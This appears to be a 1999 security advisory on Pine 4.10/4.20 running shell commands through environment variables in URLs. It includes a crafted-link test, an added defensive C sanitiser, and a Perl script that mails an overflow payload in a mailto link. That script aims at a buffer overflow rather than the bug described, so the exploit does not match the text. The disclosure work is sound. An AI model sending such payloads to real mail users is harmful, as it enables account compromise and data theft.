Pine vulnerable to expanding environment variables in URLs
30 Nov. 1999
Summary
It is possible to cause Pine to execute shell commands when a URL is visited, enabling a remote attacker to execute shell commands simply by making the mail recipient click on a URL, effectively compromising the user's account.
Credit:
This vulnerability has been reported by: Jim Hebert.
The exploit code was provided by: CyberPsychotic.
Vulnerable systems:
Pine version 4.10
Pine version 4.20
Immune systems:
Pine version 4.21
If a URL such as:
http://something/some/cgi$12345
is provided to Pine, it will try to execute the part after the "$" sign as a shell command, causing the URL to fail.
A quick test:
$ echo 'setenv WWW www.securiteam.com' >> .tcshrc
$ source .tcshrc
$ pine
Now mail yourself an email containing a link that looks like: http://$WWW))
This should cause you to visit SecuriTeam.com.
Using this vulnerability, people can at the very least get hold of your environment variables and store them in their web server access logs. In the worst case, people can get you to run shell commands (bad enough by itself) and have the output sent to them if they wish (think about cat /etc/passwd).
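The root cause is a URL being handed to an external viewer through a shell, where "$WWW" is expanded before the viewer ever sees it. The following is an added example, not Pine's code or its 4.21 fix: shell_expands() flags URLs carrying characters /bin/sh would reinterpret, and launch_viewer() starts the viewer by fork/exec with the URL as one argv element so no shell expansion can happen at all. The viewer name "true" in main() is a stand-in for a real browser command.

```c
/* Added example (not Pine's code): hand a URL to an external viewer
 * without passing it through a shell, and flag URLs that a shell would
 * mangle or execute if a "sh -c viewer URL" style launch were used. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Bytes /bin/sh treats specially when they appear unquoted. */
static const char SHELL_META[] = "$`\\\"'|&;()<>*?[]{}~#!\n\t ";

/* Returns 1 if a shell would reinterpret this URL, else 0. */
int shell_expands(const char *url) {
    return strpbrk(url, SHELL_META) != NULL;
}

/* Run viewer with the URL as a single argument.  No shell is involved,
 * so "http://$WWW))" reaches the viewer literally instead of expanded.
 * Returns the viewer's exit status, or -1 if it could not be started. */
int launch_viewer(const char *viewer, const char *url) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *argv[] = { (char *)viewer, (char *)url, NULL };
        execvp(viewer, argv);
        _exit(127);                      /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed inputs: the two URLs from the advisory plus a clean one. */
    const char *urls[] = { "http://something/some/cgi$12345",
                           "http://$WWW))",
                           "http://www.securiteam.com/" };
    for (size_t i = 0; i < 3; i++)
        printf("%-35s shell-unsafe=%d\n", urls[i], shell_expands(urls[i]));
    /* "true" stands in for a real viewer such as lynx (assumption). */
    return launch_viewer("true", urls[1]);
}
```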
The following exploit code has been released to test for this vulnerability:
#!/usr/bin/perl
$sploit="A" x 1078;
$sploit .="\@1111"; # rh 6.0/pine4.10 would love return address 0x82d4528
# or higher..
open(FOO,"| /usr/sbin/sendmail -t");
print FOO "From: bogus\@yahoo.com\nTo: victim\@somehost\n\n";
print FOO "Mail me: mailto:$sploit";
close(FOO);